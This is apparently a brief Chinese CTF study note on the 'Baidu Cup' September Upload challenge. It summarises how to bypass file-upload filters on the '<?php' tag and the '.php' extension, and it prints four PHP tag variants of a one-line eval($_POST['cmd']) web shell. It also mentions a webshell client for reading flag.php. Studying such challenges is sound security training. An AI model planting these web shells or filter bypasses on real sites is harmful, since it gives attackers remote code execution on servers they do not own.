总结
参考例题:“百度杯”CTF比赛 九月场Upload
1.头部<?php 绕过
2.文件后缀.php绕过
1.php标记的几种风格
1.
<?php
eval($_POST['cmd']);
?>
2.<script language="php">
eval($_POST['cmd']);
</script>
3.
<?
eval($_POST['cmd']);
?>
4.
<%
eval($_POST['cmd']);
%>
2.
a.不在php文件中出现.php,直接使用菜刀流工具查看flag.php(有局限性)
b.使用函数strtolower(这个没太懂)